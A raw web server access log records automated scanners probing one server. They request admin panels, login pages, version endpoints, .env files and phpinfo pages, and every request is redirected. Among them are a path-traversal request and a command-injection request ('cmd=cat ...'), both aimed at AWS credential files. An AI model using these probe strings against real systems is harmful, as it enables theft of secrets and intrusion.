51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /allversions HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /login/login.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /versions HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /lms/db HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /cgi-bin/param.cgi?get_device_conf HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /home.cfm HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /r-seenet/index.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /geoserver/index.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /webui/index.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1 HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /webui HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /inicio.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /tos/index.php?user/login HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /officescan/console/cgi/cgiChkMasterPwd.exe HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /c/login HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /kylin/ HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /login.aspx HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:57 -0500] "GET /menu.jhtml HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /admin/reports/updates HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /api/v1.0/environment HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /admin/reports/status HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /CHANGELOG.txt HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /cslu/v1/core/conf HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /config HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /inicio.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /build.gradle HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /webportal.cgi HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /pandora_console/ HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /workplace/home.action HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /themes/admin/default/build/assets/favicon-19fbef86.svg HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /centreon/api/latest/platform/versions HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /start.pl HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /api/v3/meta HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /geoserver/web/ HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /system/version/current HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /am_bin/amlogin HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /index.jsp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /hx/api/about HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /api/v1/version HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /app/ui/login.jsp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /i18n/component/JS HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /login/?next=/ HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /inicio.jsa HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /cgi-bin/luci HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1 HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET / HTTP/1.1" 302 390 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /Main_Login.asp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /metrics HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /json/login_session HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /nidp/app/login HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /rs/application-about HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /robots.txt HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /main/main.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /about HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:58 -0500] "GET /index.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /login HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /ui/login.action HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /api/v2/hoverfly/version HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /main.asp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /api/v1/info HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /mailinspector/login.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /core/auth/login/ HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /admin/config.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /~login HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /api/status HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /config_dump HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /agc/vicidial.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /admin.shtml HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /agent/vicidial.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /index.do HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /nifi/ HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /decisioncenter-api/v1/about HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /jtcgi/wte.pyc HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /inicio.cfm HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /AppsHome.do HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /openapi.json HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /nifi-api/flow/about HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /system/gwinfo HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /info.htm HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /index.lua HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /admin.pl HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /cgi-bin/meteobridge.cgi HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /api-description HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /sys/en/neoclassic/login/login HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /wp-content/plugins/post-smtp/readme.txt HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /monitor/index.php/auth/login HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /v2 HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /owa/ HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /ignite?cmd=version HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /management/v1/cluster/state HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /sap/bc/ui2/flp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:50:59 -0500] "GET /indice.asp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /browser/index.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /cgi-bin/getagent.cgi?type=s HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /ScadaBR/login.htm HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /api/v2.0/systeminfo HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /api/v1/cluster/summary HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /nmc/rss/server HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /admin.jsp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /webpages/login.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /download/python/ HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /api/system/status HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /admin HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /inicio.pl HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /metasys/com/jci/metasys/MetasysProperties.properties HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /remote/login HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /_matrix/identity/v2 HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /rest/settings HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /sms_mp/.sms_aut?mplist HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /admin.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /main.jhtml HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:00 -0500] "GET /main.jsa HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:01 -0500] "GET /owa/ HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:01 -0500] "GET /default.asp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:01 -0500] "GET /localstart.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:01 -0500] "GET /admin.jhtml HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:01 -0500] "GET /default.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:01 -0500] "GET /admin.html HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:02 -0500] "GET /base.jsp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:02 -0500] "GET /admin.cgi HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:02 -0500] "GET /admin.cfm HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:02 -0500] "GET /admin.aspx HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:02 -0500] "GET /base.jsa HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:03 -0500] "GET /index.pl HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:03 -0500] "GET /menu.cfm HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:03 -0500] "GET /default.aspx HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:03 -0500] "GET /localstart.jhtml HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:03 -0500] "GET /admin.jsa HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:04 -0500] "GET /base.pl HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:04 -0500] "GET /index.jsa HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:04 -0500] "GET /base.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:04 -0500] "GET /indice.cgi HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:04 -0500] "GET /default.jhtml HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:05 -0500] "GET /home.pl HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:05 -0500] "GET /admin.asp HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:05 -0500] "GET /base.jhtml HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:05 -0500] "GET /base.inc HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:06 -0500] "GET /start.php HTTP/1.1" 302 270 "-" "curl/7.54.0"
51.81.155.131 - - [12/Feb/2026:12:51:06 -0500] "GET / HTTP/1.1" 302 390 "-" "-"
51.81.155.131 - - [12/Feb/2026:12:51:06 -0500] "GET / HTTP/1.1" 302 390 "-" "-"
204.76.203.212 - - [12/Feb/2026:12:55:58 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.167.232.38 - - [12/Feb/2026:13:00:06 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.206 - - [12/Feb/2026:13:02:54 -0500] "GET / HTTP/1.1" 302 390 "-" "Wget"
204.76.203.69 - - [12/Feb/2026:13:10:17 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
81.168.83.103 - - [12/Feb/2026:13:12:43 -0500] "GET /.aider.conf.yml HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
185.247.137.137 - - [12/Feb/2026:13:17:30 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
204.76.203.212 - - [12/Feb/2026:13:21:23 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [12/Feb/2026:13:43:55 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.18 - - [12/Feb/2026:13:47:05 -0500] "GET /backup/ HTTP/1.1" 302 270 "-" "-"
204.76.203.206 - - [12/Feb/2026:13:47:06 -0500] "GET / HTTP/1.1" 302 390 "-" "Wget"
130.213.14.73 - - [12/Feb/2026:13:52:13 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
130.213.14.73 - - [12/Feb/2026:13:52:18 -0500] "GET /_profiler/phpinfo.php HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
130.213.14.73 - - [12/Feb/2026:13:52:23 -0500] "GET /phpinfo HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
130.213.14.73 - - [12/Feb/2026:13:52:26 -0500] "GET /_profiler/phpinfo HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
130.213.14.73 - - [12/Feb/2026:13:52:29 -0500] "GET /info HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
130.213.14.73 - - [12/Feb/2026:13:52:34 -0500] "GET /phpinfo.php HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
130.213.14.73 - - [12/Feb/2026:13:52:37 -0500] "GET /info.php HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
130.213.14.73 - - [12/Feb/2026:13:52:43 -0500] "GET /.env HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:52:45 -0500] "GET /.env.production HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:52:48 -0500] "GET /application/.env HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:52:50 -0500] "GET /prod/.env HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:52:51 -0500] "GET /.env.save HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:52:53 -0500] "GET /beta/.env HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:52:55 -0500] "GET /admin/.env HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:52:56 -0500] "GET /app/.env HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:52:58 -0500] "GET /config/.env HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:52:59 -0500] "GET /api/.env HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:53:01 -0500] "GET /laravel/.env HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:53:02 -0500] "POST / HTTP/1.1" 302 390 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:53:05 -0500] "GET //pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000 HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:53:07 -0500] "GET //admin/config?cmd=cat+/root/.aws/credentials HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:53:12 -0500] "GET //.aws/credentials HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:53:13 -0500] "GET //.aws/config HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:53:15 -0500] "GET //home/user/.aws/credentials HTTP/1.1" 302 270 "-" "-"
130.213.14.73 - - [12/Feb/2026:13:53:19 -0500] "GET //config/.aws/credentials HTTP/1.1" 302 270 "-" "-"
45.135.193.11 - - [12/Feb/2026:14:07:45 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:14:07:45 -0500] "GET /.env HTTP/1.1" 302 270 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:14:07:45 -0500] "GET /.env.local HTTP/1.1" 302 270 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:14:07:45 -0500] "GET /.env.staging HTTP/1.1" 302 270 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:14:07:46 -0500] "GET /.env.production HTTP/1.1" 302 270 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:14:07:46 -0500] "GET /.env.development HTTP/1.1" 302 270 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:14:07:46 -0500] "GET /.aws/credentials HTTP/1.1" 302 270 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:14:07:46 -0500] "GET /app/.env HTTP/1.1" 302 270 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:14:07:46 -0500] "GET /config.json HTTP/1.1" 302 270 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
204.76.203.212 - - [12/Feb/2026:14:11:31 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.191.67 - - [12/Feb/2026:14:14:07 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
104.196.169.131 - - [12/Feb/2026:14:21:00 -0500] "HEAD /backup/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPad; CPU OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Mobile/15E148 Safari/604.1"
104.196.169.131 - - [12/Feb/2026:14:21:01 -0500] "HEAD /blog/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Linux; Android 14; OnePlus 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.102 Mobile Safari/537.36"
104.196.169.131 - - [12/Feb/2026:14:21:01 -0500] "HEAD / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Linux; Android 14; SM-A146P) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/25.0 Chrome/123.0.6312.120 Mobile Safari/537.36"
104.196.169.131 - - [12/Feb/2026:14:21:02 -0500] "HEAD /wordpress/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
104.196.169.131 - - [12/Feb/2026:14:21:02 -0500] "HEAD /old/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edg/128.0.2790.25 Chrome/128.0.6540.22 Safari/537.36"
